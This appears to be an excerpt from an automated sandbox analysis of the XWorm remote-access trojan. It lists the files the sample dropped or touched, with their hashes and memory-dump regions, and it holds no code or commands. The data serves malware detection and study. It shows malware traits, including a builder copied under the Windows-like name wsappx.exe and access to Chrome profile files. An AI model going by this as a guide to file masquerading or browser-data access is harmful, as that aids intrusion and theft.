| SHA256 | 3eba06d8a5a66b209d8cadd7e7215290d5961d7649a458ea7c9be40acffc4ce2 |
| SHA512 | 9b2f42053ada800c33135cee04b21fa07c6f9dcb7521517be67e37956e83a0f14bc97319e4f882b3f38300ca7a9c5f3753f088cd223f3dbc5e5658a865ef59a0 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000b
| MD5 | 49943bc015e9713f646c021a2f9a7f48 |
| SHA1 | 7bcd637eb823b04c425775fa8c914e8b8f2ac2a5 |
| SHA256 | f6e0b13ad81727a0d9317a3049fd06ecf2c473060e9d6e4f8eb564a1d82ad289 |
| SHA512 | 2203c2dbe9482b0b351a3f70ea0ba9f63dcc87a66d4a4db63a060dd7dd04cb73a73bced407d57c2bcf26cf7ed78b18c7555c87b22db9bd744cb6491cd040305d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000c
| MD5 | bd7d3718eec41214d0e6d4d828e1cfde |
| SHA1 | be505011345ac2c2f1c4776c79ec327be955dadc |
| SHA256 | 1d401b64876b2174de22d945698d3d8d750fb83e6df1e0bed01ea2569feadb7f |
| SHA512 | 875ae5cc609f0ea5bc079879c1dc56a3da4207f411e09c9456a50b0c6248ae9f4a45362a70ce4731a0484b0a821a93a60233376f254eec3f3a8611803f397f1e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | da438e7343e50afc765954e3d2b55306 |
| SHA1 | 3174b6d8cbe54353b9f0c81b1e39bf4c1fa4cd7d |
| SHA256 | 6a07811ea98f376d4ab01ce06bd9d85e2b414114782bf6ceac0e825da46ebf4b |
| SHA512 | dc1f92c1f11175cb41cd70ab8fa35807619c818d45d0b745242afcaaa657b3d8d98385405fe76885405c2f2fe933ba7900667b19e797b82336bf94f98c01b082 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 04e9419a7822a588432d6f21d9a46e05 |
| SHA1 | 0f3a3c1283f9d1ab1887c895cc504c6e4bb2fad1 |
| SHA256 | 088030c1ab14471ee13b7025f0b12329924cf6bb388e37e264e4b39df118aeee |
| SHA512 | f698846628fbc99fc61a37f1c0b3afa14c046dd67da4083affdc42da27b7ff8d8e779fb8fbbe212222e1c29bd5910d62b8fd493878a17ba11024715c8884828f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | e0633e9f41c50a83723b6eb751ec80ff |
| SHA1 | 4495e03b9210257a0d1f19afa61dedb69fed56bf |
| SHA256 | beb068f6abf8dc31605caeb6d53f88de7c31d4e0284046bd48111cceb59ad797 |
| SHA512 | 88ca9cee527f35833b1d9a7ef3874aedcbea6b7b24d466f945ad77ce06983b724cf12190a33604f03a5b17af5ff0ee2ce63f3b8eae1f997e3dcb3ce85728bc82 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 6fbb5d28bcce8f5ad8fb041cf2041606 |
| SHA1 | 9399023938e4540d6196866c89dc1a6d8cd7ad42 |
| SHA256 | e0352eca0bc64acff568b15aaccea133289b00c59d63f800165436e44390ba48 |
| SHA512 | 8d6498654d5f17dfac5e2ff7b838592ff2a29cc356ddf9d8c5a7ecc9ca5cf64202a56a98d649419da1d13581c5673e87a5018a9491283471a7fa0d4e2b90d4e2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | b0e0d1b2381776d1d099fd34622f2aac |
| SHA1 | ba41e25276fed84dff5e299fd73d6e8455195ba2 |
| SHA256 | 16132fb0b8c7ad3cc7f5f3e114ff22492a2bc686d73f566626ffa48daa7e4034 |
| SHA512 | 47bccbfb1add10bda39cfb79d1c6ee5380d1c9643b87a379b30fbada35205a4db1fcf511a2723d6e2888214cc9e5326d07f196c7539dd8539b0e6272fddf80fa |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 1b6fb40c8c75f8006a9ccb1a9ef1bfe6 |
| SHA1 | 5289edd685c4b93feabcbba7242688ec0edbee3b |
| SHA256 | fee277c5e8f85a657a2f8b87fd026187bcff8b7cd88bb68d23f5b16b197d38b2 |
| SHA512 | 85cd6153a8107f53711cf54f37226bd4e897a7df4698f9fd5700b0f8ca7086a1d0360a890f4065ae7cfe5165b25e287c252f3b674a8a51db46ac6374c4caa928 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 0445a61cceaed99d86b2cd3eb9fedc0c |
| SHA1 | fa5a4c3bd5f5dddea5ffbd945477c304514d0517 |
| SHA256 | 48fcd180a256b8adb4ece153a1a12db8ce3293ccf5740f96d3a969849a789f8f |
| SHA512 | b06e21b17ed1b4aaacf5898264e8a59dba4b6c4fe9767b76b6bcb446c1c7164b648734b9156ef938ad2ca67e0fb3bbd59e2f07ec4f707a290d793eabb0df0de3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | b66dec467b8cfb4726e12a2ba3f37e80 |
| SHA1 | dd877d191c3547eabdcaf4db974c2fa15e944aab |
| SHA256 | 19b956a349da12106b9480b3f0eff42b4ea71e16d4226cb42e314bdb4703afe7 |
| SHA512 | 7615520359ddfb35ba97145de3b95302d12deb3e1631d2e4184392240f842e05d80ea7d41a074db6c2d7ba6293b8eb5b46f09bbd2618aae802412928097830fe |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 8e0da37cff56b2389a2edd1a1742d905 |
| SHA1 | 9fce02e731595d8961b81cb2600877817cbee8ec |
| SHA256 | 36f2a2bcb333a8be214624397813f4b6d79a59fb3f6fe747bc1aff7f99e5a5a0 |
| SHA512 | b11999fb171d7850b2c469b34a4d1fdc244c476ee83395a025f0ed00736313c43f9ca0b4ad3498cc4bb23e4944d5d2c9ccb1c09260e38546f462cb064799a41e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 1871d89d49f1ae810cbb163bb5f39277 |
| SHA1 | c5b3e0b0627585e9f3a4889a94afc3c3f4d022b3 |
| SHA256 | a38f3b5805cde53250fd355087e5a3b7829f19c3f35403c9d89f83ddd0743b51 |
| SHA512 | 17e8900a64c4a67d28a3f6a56d46414f099d20aae2a0bd4545447e7e689f98bef4304152e470f9352accd581f522904501b2aa7760d18bbe882c348546af8004 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000023
| MD5 | b3651e618098746c8784d8f2feb975da |
| SHA1 | f84dc5e2231456a8eb6741f0a7d3d737d64abc14 |
| SHA256 | 78faf57d9f3ab2ef0a7acf46fac725982c6fc12602464119adcc8a13d8374c13 |
| SHA512 | ae540878b51a58b19c50ec17f1a80cb9ad242e9fda9ce8cba67c7f5f982ffd9a3befba651c45bd2efa99a78811c3ed850ec3ef27846457099ab043a48454f682 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000024
| MD5 | 569dfa01693b4852d4add224acfc22ed |
| SHA1 | af8a9f6a866f48397e5cdd99df12318b78f678c7 |
| SHA256 | bf21dd8eabc863e5a20ba122acf08f98c7b5e83f24805c71a3c2945bed8ee276 |
| SHA512 | efb9ba145c9c976774b4b4d7560134f0a19e57c1eacb304f00ecfd40986aef5a205598ab182ad2479b632e2a823a96a86fd1bb3861cea8f0ef4fdc427b1abbfa |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | d4bae190037a5633055051f64f65a510 |
| SHA1 | 9872dd3a9eb036ecc04c02a5f18ac27e35d5bcca |
| SHA256 | 70a1826a203409270af02ea429666cc1a1ca1b35d5f61c4b531de55200c55f34 |
| SHA512 | bc84339e312f650466910483f6e1565c1a23509cd18e851646e395ca9452c2e55c1080b9d174b75cc92867821bba07aabd1f1fca66bf13f88410446f70db5450 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 76e1a67813f334a6f48fb573782bbae4 |
| SHA1 | ca3a6d75b7595f0d63957fb015f0aad7b79f0dc1 |
| SHA256 | e43a10663aee46282532e57b846e031ad1cb6c4bcb436c2e67f3fec563b85083 |
| SHA512 | fd0292d05e4e7875affdb33d037594f7fcefc01cc1243467aa747f08d3a20e0d8635d426d3f0b4cdafd043af05028a8cab080189a4c140eec2704680067bb706 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | e8b6557593ebc7246a769e85cadc181f |
| SHA1 | 03dfe16bebe3247135596b86f9938cd9eb97af0d |
| SHA256 | 278f8bfe9bb174af6622b9ed5003abf516cf333e2af32e3ed46f57cd3ab99b58 |
| SHA512 | e961597c9171352b722cb7cb255d34a8d11317ade1645cf4721f4ab3cf6e5bfc98d168cc6fdf0be343b580773cfe9d04eb5a7c272910abef1a2820e84589746d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000021
| MD5 | b16fe16341cfc5d5706c5c32c74288d4 |
| SHA1 | ede08fafca0c938aac4e857f9d6695e77e50533f |
| SHA256 | 9a945fa143b6bba59643b0392b518c7b6f8588df824ea17aef80ec1051fff8ab |
| SHA512 | 7d61330b8981c39fdd68112bf1086b93fe5e196bc9b8e346aa30d27caaaa8aadd81838b8289c57ba64ccc68c99586d91d64c85ecdd57dc30f8585348c417e279 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | fbc37a25854efa623a4f233e6da79480 |
| SHA1 | acae0d578bc6d1322df8cd4290b54b94104b7eef |
| SHA256 | 49c6a528085070069d7e5bc0024c80872c872c0ded5842d7079ac9f5cbca821d |
| SHA512 | 3d3c000bf95431a63e87769a823ac0ddb5ad25675fdfaf7ce921d2b2ef0768f7b397d1cf764cb7931b03e38c98512e09227573f74c1481c2ecec87b7387038e2 |
memory/3724-834-0x0000025FA87A0000-0x0000025FA8ADE000-memory.dmp
memory/3724-836-0x00007FFE0DE00000-0x00007FFE0E8C1000-memory.dmp
memory/3724-837-0x0000025FC2FF0000-0x0000025FC3000000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\win-xworm-builder.exe
| MD5 | 835d21dc5baa96f1ce1bf6b66d92d637 |
| SHA1 | e0fb2a01a9859f0d2c983b3850c76f8512817e2d |
| SHA256 | e67f2b34ef647d59eb8ebd4a88f85dc072346ca5c275cba1ee2307b80a560319 |
| SHA512 | 747a9b6cde0207c722a62904a2c8708188f7c9e65e94cf55667e90096f1d1852e145061bd8e764bf30aaca0fb0f4355668feccc951041af735677c4c644aba87 |
C:\Users\Admin\AppData\Local\Temp\win-xworm-builder.exe
| MD5 | 835d21dc5baa96f1ce1bf6b66d92d637 |
| SHA1 | e0fb2a01a9859f0d2c983b3850c76f8512817e2d |
| SHA256 | e67f2b34ef647d59eb8ebd4a88f85dc072346ca5c275cba1ee2307b80a560319 |
| SHA512 | 747a9b6cde0207c722a62904a2c8708188f7c9e65e94cf55667e90096f1d1852e145061bd8e764bf30aaca0fb0f4355668feccc951041af735677c4c644aba87 |
C:\Users\Admin\AppData\Local\Temp\win-xworm-builder.exe
| MD5 | 835d21dc5baa96f1ce1bf6b66d92d637 |
| SHA1 | e0fb2a01a9859f0d2c983b3850c76f8512817e2d |
| SHA256 | e67f2b34ef647d59eb8ebd4a88f85dc072346ca5c275cba1ee2307b80a560319 |
| SHA512 | 747a9b6cde0207c722a62904a2c8708188f7c9e65e94cf55667e90096f1d1852e145061bd8e764bf30aaca0fb0f4355668feccc951041af735677c4c644aba87 |
C:\Users\Admin\Desktop\builder.exe
| MD5 | a21db5b6e09c3ec82f048fd7f1c4bb3a |
| SHA1 | e7ffb13176d60b79d0b3f60eaea641827f30df64 |
| SHA256 | 67d9b4b35c02a19ab364ad19e1972645eb98e24dcd6f1715d2a26229deb2ccf5 |
| SHA512 | 7caab4f21c33ef90c1104aa7256504ee40ff0a36525b15eb3d48940862346ccf90a16eef87c06d79b0ffd920beb103ed380eae45df8c9286768890b15ed1067c |
memory/1668-857-0x000002B7BD120000-0x000002B7BD1EC000-memory.dmp
memory/1668-856-0x00007FFE0DE00000-0x00007FFE0E8C1000-memory.dmp
memory/1668-861-0x000002B7BD5E0000-0x000002B7BD5F0000-memory.dmp
memory/4928-862-0x0000000074890000-0x0000000075040000-memory.dmp
memory/4928-863-0x0000000000C90000-0x0000000001322000-memory.dmp
memory/4928-864-0x0000000005D20000-0x0000000005DBC000-memory.dmp
memory/4928-868-0x00000000063B0000-0x0000000006954000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | c9817a3122580815cd100c769abfa820 |
| SHA1 | ee44c878da86d617d0c7fff3ab50c89985ad9264 |
| SHA256 | 6c27197854034cdaddd068f40a9517ccfd0674f3f4b25996bd5600e6ce76e080 |
| SHA512 | 8072d8ff2bd114b7b3a4bc92156b104747b8caf39b3c86b0bd8029d720b977fac9ea5c9c276f1d6cc8977734fd8cb433ae7f84584817b770ebb5916938995906 |
memory/3724-879-0x0000025FC2FC0000-0x0000025FC2FCA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmpE238.tmp.bat
| MD5 | e26f3dc7dd25e77636064f9cce98401b |
| SHA1 | 05152475ac249a3c649478d88ea5f581c3dbafcf |
| SHA256 | 32a73c6086053f221237b90477a3047cc90b19fd5a9c856d48e627665b293f55 |
| SHA512 | 35654c6dd6b215d662f48fbe7553fa15812875034ad23e60d2dd58a6e4759bcce0e0f97fc7489091bcec562e8f821b6f290e99ef9558b8da90d9da2897e4a7f2 |
memory/1668-880-0x00007FFE0DE00000-0x00007FFE0E8C1000-memory.dmp
memory/4928-884-0x0000000005E00000-0x0000000005E92000-memory.dmp
memory/3724-887-0x00007FFE0DE00000-0x00007FFE0E8C1000-memory.dmp
C:\Users\Static\wsappx.exe
| MD5 | 835d21dc5baa96f1ce1bf6b66d92d637 |
| SHA1 | e0fb2a01a9859f0d2c983b3850c76f8512817e2d |
| SHA256 | e67f2b34ef647d59eb8ebd4a88f85dc072346ca5c275cba1ee2307b80a560319 |
| SHA512 | 747a9b6cde0207c722a62904a2c8708188f7c9e65e94cf55667e90096f1d1852e145061bd8e764bf30aaca0fb0f4355668feccc951041af735677c4c644aba87 |
memory/2576-891-0x00007FFE0DE00000-0x00007FFE0E8C1000-memory.dmp
memory/3724-893-0x0000025FC2FF0000-0x0000025FC3000000-memory.dmp
memory/4928-892-0x0000000006080000-0x0000000006090000-memory.dmp
memory/4928-894-0x0000000005D10000-0x0000000005D1A000-memory.dmp
memory/4928-895-0x0000000005F00000-0x0000000005F56000-memory.dmp
memory/3724-896-0x00007FFE0DE00000-0x00007FFE0E8C1000-memory.dmp
memory/4928-897-0x0000000074890000-0x0000000075040000-memory.dmp
memory/4928-898-0x0000000006080000-0x0000000006090000-memory.dmp
memory/4928-899-0x00000000071B0000-0x0000000007216000-memory.dmp
memory/2576-900-0x00007FFE0DE00000-0x00007FFE0E8C1000-memory.dmp
memory/2124-901-0x000002325F430000-0x000002325F431000-memory.dmp
memory/2124-902-0x000002325F430000-0x000002325F431000-memory.dmp
memory/2124-903-0x000002325F430000-0x000002325F431000-memory.dmp
memory/2124-907-0x000002325F430000-0x000002325F431000-memory.dmp
memory/2124-908-0x000002325F430000-0x000002325F431000-memory.dmp
memory/2124-910-0x000002325F430000-0x000002325F431000-memory.dmp
memory/2124-909-0x000002325F430000-0x000002325F431000-memory.dmp
memory/2124-912-0x000002325F430000-0x000002325F431000-memory.dmp
memory/4928-911-0x0000000006080000-0x0000000006090000-memory.dmp
memory/2124-913-0x000002325F430000-0x000002325F431000-memory.dmp
memory/2124-914-0x000002325F430000-0x000002325F431000-memory.dmp
memory/2576-915-0x00007FFE0DE00000-0x00007FFE0E8C1000-memory.dmp
memory/4928-916-0x0000000006080000-0x0000000006090000-memory.dmp
C:\Users\Admin\Desktop\builder.exe
| MD5 | a21db5b6e09c3ec82f048fd7f1c4bb3a |
| SHA1 | e7ffb13176d60b79d0b3f60eaea641827f30df64 |
| SHA256 | 67d9b4b35c02a19ab364ad19e1972645eb98e24dcd6f1715d2a26229deb2ccf5 |
| SHA512 | 7caab4f21c33ef90c1104aa7256504ee40ff0a36525b15eb3d48940862346ccf90a16eef87c06d79b0ffd920beb103ed380eae45df8c9286768890b15ed1067c |
memory/1556-918-0x0000000074890000-0x0000000075040000-memory.dmp
memory/1556-919-0x0000000005BC0000-0x0000000005BD0000-memory.dmp
memory/1556-920-0x0000000005BC0000-0x0000000005BD0000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 2eef15964baa38dae2fa5af71207ccbb |
| SHA1 | d38afce3a3c908e5ee29e08ce763935dc09e61a6 |
| SHA256 | 66f4de48570213a73defbcc2ecf260ff0f71fb8086d5d2836f37e82bb56711b8 |
| SHA512 | 63311b0e30bddf9bc546b25aeee62ba326ef0db1880e1853a1fef4f39ae5b331c8a3494074c0e79ee48135e13549fe4d7b44fb1650b1e43ee037837de0a21b67 |
memory/1556-931-0x0000000074890000-0x0000000075040000-memory.dmp
memory/1512-933-0x0000000074890000-0x0000000075040000-memory.dmp
memory/1512-932-0x0000000000210000-0x00000000003FA000-memory.dmp
memory/1512-934-0x0000000004C60000-0x0000000004C70000-memory.dmp
memory/1512-935-0x0000000005F50000-0x0000000006174000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1a5fdae6-8f46-4b8b-a738-d6572f690d43\AgileDotNetRT.dll
| MD5 | 14ff402962ad21b78ae0b4c43cd1f194 |
| SHA1 | f8a510eb26666e875a5bdd1cadad40602763ad72 |
| SHA256 | fb9646cb956945bdc503e69645f6b5316d3826b780d3c36738d6b944e884d15b |
| SHA512 | daa7a08bf3709119a944bce28f6ebdd24e54a22b18cd9f86a87873e958df121a3881dcdd5e162f6b4e543238c7aef20f657c9830df01d4c79290f7c9a4fcc54b |
memory/1512-943-0x00000000732A0000-0x0000000073329000-memory.dmp
memory/1512-944-0x0000000004C60000-0x0000000004C70000-memory.dmp
memory/1512-945-0x0000000004C60000-0x0000000004C70000-memory.dmp
memory/1512-946-0x0000000074890000-0x0000000075040000-memory.dmp
memory/1512-947-0x0000000004C60000-0x0000000004C70000-memory.dmp
memory/1512-948-0x0000000004C60000-0x0000000004C70000-memory.dmp
memory/1512-949-0x0000000004C60000-0x0000000004C70000-memory.dmp
memory/1512-950-0x0000000004C60000-0x0000000004C70000-memory.dmp
memory/1512-952-0x0000000074890000-0x0000000075040000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\qypivi1f\qypivi1f.cmdline
| MD5 | 14bb9d57a9897e2e4313aa462c96e6b9 |
| SHA1 | 9f29cffe57e14f89bbf3323933483bd207c33529 |
| SHA256 | 7ee00d18df0c6b972b4b0138f73a2163f304e052811530ae4d0d51b800367be2 |
| SHA512 | 1a04482cd456b115dd9af5b0b97ab15adf51b6f454d5e53f5239f6dec3cff09f01b0e8f39df3e9a8324a054557b70a7c6db05d0eb9d6516de87da95b8def87a8 |
C:\Users\Admin\AppData\Local\Temp\qypivi1f\qypivi1f.0.vb
| MD5 | 3bac7893c9fd8069f8da8d14c1191257 |
| SHA1 | 8b1bd55f1d77bc15ab4082324bdc0f684ba6da53 |
| SHA256 | 5f9191012621c4784df56bd0949c46c7eb1d4d67bece5c43b4099f5facd1f29a |
| SHA512 | 5950a919acbca7f1f5baf6d4764e78bf5475812dc34f501f407895a658be86610eae0b66dd69475621abb4c251862813d083421d156b431faf32feab2ca8c0c7 |
C:\Users\Admin\AppData\Local\Temp\vbcF87B34828AF45FD95422731E385FB80.TMP
| MD5 | b70192bdfa82953d23893557b94122f2 |
| SHA1 | 4fd73efd6a6b28f57df1dde6a4241526c5b0fb60 |
| SHA256 | 6443d3bc34cc48e858c4fdb3ab0ad9a433705f266cb70f92886e90cbf589eab4 |
| SHA512 | 6dcb0273ffe6675af850d0a5e1976d9e8f8e9d6306a21856b1df4d8c0fef38fb8ff28f113e8c8b923c6451e32e734c514a15f79efe6316f180874f78608928da |
C:\Users\Admin\AppData\Local\Temp\RES7B37.tmp
| MD5 | 25b307c39e69b94d9d9a3ab59eaf3250 |
| SHA1 | 37b0403ef89e05ec8bb69a84a6c9e77606581816 |
| SHA256 | 8343254162b8a597bc6daf93e4bf689657c74d05072dd98e548b81123e242bc5 |
| SHA512 | 74e092d2eb4f416909048bceb84794373c0ce486cf48966dbd07b85c4ef87b776a00c0647b5c626de250756c1566562cb8466b4a621f60a8780c8af693f0f539 |
C:\Users\Admin\Desktop\XWorm.exe
| MD5 | 1b17dc0a383a40825ac21337ce31cd0b |
| SHA1 | fac0e76c443cda0576705058c11ca3ecd4f68968 |
| SHA256 | f5e997ef0c3a32a46ec68b6fef96a440d5ee8ace3015610a9fc6f9700980c81b |
| SHA512 | 3c0a0d5175c50139f54b1cfe4dbd69019d92940fdc314e9bbe612a71b850ba0c986ca6dd8ead6515ec2f05631f19bc0bc47de2dd6a429eea4cc756f49e506d95 |
memory/3596-970-0x0000000000780000-0x0000000000790000-memory.dmp
memory/3596-971-0x00007FFE0DB40000-0x00007FFE0E601000-memory.dmp
memory/3596-972-0x0000000002920000-0x0000000002930000-memory.dmp
memory/4928-974-0x0000000006080000-0x0000000006090000-memory.dmp
memory/4928-973-0x0000000012BB0000-0x0000000012C32000-memory.dmp
memory/3596-975-0x00007FFE0DB40000-0x00007FFE0E601000-memory.dmp
memory/3596-976-0x0000000002920000-0x0000000002930000-memory.dmp
memory/4928-977-0x0000000006080000-0x0000000006090000-memory.dmp
memory/2840-979-0x000002C7CF1D0000-0x000002C7CF1D1000-memory.dmp
memory/2840-978-0x000002C7CF1D0000-0x000002C7CF1D1000-memory.dmp
memory/2840-980-0x000002C7CF1D0000-0x000002C7CF1D1000-memory.dmp
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val
| MD5 | 6bd369f7c74a28194c991ed1404da30f |
| SHA1 | 0f8e3f8ab822c9374409fe399b6bfe5d68cbd643 |
| SHA256 | 878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d |
| SHA512 | 8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93 |
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx
| MD5 | d2fb266b97caff2086bf0fa74eddb6b2 |
| SHA1 | 2f0061ce9c51b5b4fbab76b37fc6a540be7f805d |
| SHA256 | b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a |
| SHA512 | c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8 |
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock
| MD5 | f49655f856acb8884cc0ace29216f511 |
| SHA1 | cb0f1f87ec0455ec349aaa950c600475ac7b7b6b |
| SHA256 | 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba |
| SHA512 | 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8 |
memory/2840-986-0x000002C7CF1D0000-0x000002C7CF1D1000-memory.dmp
memory/2840-985-0x000002C7CF1D0000-0x000002C7CF1D1000-memory.dmp
memory/2840-987-0x000002C7CF1D0000-0x000002C7CF1D1000-memory.dmp
memory/2840-988-0x000002C7CF1D0000-0x000002C7CF1D1000-memory.dmp
memory/2840-990-0x000002C7CF1D0000-0x000002C7CF1D1000-memory.dmp
memory/2840-989-0x000002C7CF1D0000-0x000002C7CF1D1000-memory.dmp
memory/3596-993-0x000000001D560000-0x000000001DA88000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\builder.exe.log
| MD5 | 5200da2e50f24d5d543c3f10674acdcb |
| SHA1 | b574a3336839882d799c0a7f635ea238efb934ee |
| SHA256 | d2d81c1c9d35bc66149beaa77029bee68664d8512fc1efe373180bab77d61026 |
| SHA512 | 24722a7de3250a6027a411c8b79d0720554c4efd59553f54b94ab77dc21efbf3191e0912901db475f08a6e9c1855d9e9594504d80d27300097418f4384a9d9cb |
memory/4928-1009-0x0000000074890000-0x0000000075040000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
| MD5 | 5c654283ea5fc50e549fd4522342d701 |
| SHA1 | d0bfaf182b39e29e30d0c53146027b4f3ff9a59c |
| SHA256 | 409c272228c3a717ba78295e14ad76d16e48dac758d94408ff7e681390466f9a |
| SHA512 | 8c206ddf67ea5b05eeae48fbab3c92748b0c2900ec36d09f86a1de415478aeb01a5569c4ff319c74bc271ff09c501294e2e7e59051c47c82cff7e3aeacd4892a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63
| MD5 | 8114fe05a8b654a53d61c41bae0cc045 |
| SHA1 | 61504c41f564eeae5af502b16b8efe948bb6b593 |
| SHA256 | 4042edd1c2ccc58f0a948a960e0ab0a92d525b2093c4863c622524fd3df48d7d |
| SHA512 | 299b90ba7d15c0a105f363708a679f85dbdd9deed2e97079377a57118cbd65bdb743093816087c9281b9542d62514a4d13690423a4c219760b2cbf7f4e333d77 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63
| MD5 | dbd695d2cc44a7e6a6e97cfd21fe71ee |
| SHA1 | cc055edabaf9d5ffce2dfb6fc6acdcdbf80749dd |
| SHA256 | 40470b8a514750ebed665a5e9b29955430f98f4406b23fbbad0c132e11cead83 |
| SHA512 | de7adbc9b454e4ba114a85663aac1fb27b7be55af314f2481f6d6004bbf46a51f7921be1ccff0c716d14f162aed8157f642cb446b612595d5abae8e62da72468 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868
| MD5 | 13983f77bf4bb66bbd64e310eb2bffc9 |
| SHA1 | cf1857763eac12a0675fa93068734820289de75a |
| SHA256 | 17599982051a3a2f1b8a609bc7c970b18cdc25507e7979fa418a1ad6057f985d |
| SHA512 | d304d7ff8157ef141deee06ffe2e071e651105375b8462a90690786ce20aeef8a790b5e3d301af855d622e102b5e68e6c941ec5185817e9a80d0d0e2e94407bc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868
| MD5 | 75239bad564e6a526ad9a61d9e6c5397 |
| SHA1 | 4474ee15bb5a5dd09f282ad69e9842f5e871edba |
| SHA256 | 1006685e191aa47457164764b54b4e57b552d75edc1406de9c41ed9072e8b45b |
| SHA512 | ac99c2768b1915cb6babb126b583393200a96294d8b59ba82f132da2a235269dcfab62a6464878e64a095b3fc74fba56da5cf001a2e1d808e7d645a0600cc2fe |
memory/4136-1016-0x0000000004DF0000-0x0000000004DF1000-memory.dmp
memory/3848-1023-0x000002EB0FC70000-0x000002EB0FC90000-memory.dmp
memory/3848-1025-0x000002EB0FC30000-0x000002EB0FC50000-memory.dmp
memory/3848-1028-0x000002EB10040000-0x000002EB10060000-memory.dmp
memory/3676-1037-0x0000024FD09F0000-0x0000024FD09F1000-memory.dmp
memory/3676-1038-0x0000024FD09F0000-0x0000024FD09F1000-memory.dmp
memory/3676-1039-0x0000024FD09F0000-0x0000024FD09F1000-memory.dmp
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock
| MD5 | f49655f856acb8884cc0ace29216f511 |
| SHA1 | cb0f1f87ec0455ec349aaa950c600475ac7b7b6b |
| SHA256 | 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba |
| SHA512 | 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8 |
memory/3676-1042-0x0000024FD09F0000-0x0000024FD09F1000-memory.dmp
memory/3676-1043-0x0000024FD09F0000-0x0000024FD09F1000-memory.dmp
memory/3676-1044-0x0000024FD09F0000-0x0000024FD09F1000-memory.dmp
memory/3676-1045-0x0000024FD09F0000-0x0000024FD09F1000-memory.dmp
memory/3676-1046-0x0000024FD09F0000-0x0000024FD09F1000-memory.dmp
memory/3676-1047-0x0000024FD09F0000-0x0000024FD09F1000-memory.dmp
memory/3596-1049-0x00007FFE0DB40000-0x00007FFE0E601000-memory.dmp
